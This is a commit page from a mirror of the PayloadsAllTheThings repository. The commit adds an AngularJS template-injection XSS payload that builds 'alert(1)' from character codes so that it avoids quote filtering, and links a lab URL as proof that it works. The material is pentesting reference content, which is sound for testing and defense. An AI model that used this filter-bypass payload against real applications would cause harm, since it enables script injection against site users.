daffainfo
/
PayloadsAllTheThings
mirror of https://github.com/daffainfo/PayloadsAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

[Update] Added 1 payload 

Added one payload which executes without any usage of single or double quotes. Helpful when you have AngularJS injection but quotes are blocked by application.
Working proof of payload here: 

https://portswigger-labs.net/xss/angularjs.php?type=reflected&csp=0&version=1.6.0&x={{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}
patch-1
Viren Pawar 2020-08-15 16:29:13 +05:30 committed by GitHub
parent d1104d6ce1
commit 0266a7dd67
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
XSS Injection/XSS in Angular.md
View File

@ -149,6 +149,14 @@ AngularJS 1.0.1 - 1.1.5 and Vue JS
{{constructor.constructor('alert(1)')()}}
```
### Advanced bypassing XSS
AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter.com/VirenPawar_)
```javascript
{{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}
```
### Blind XSS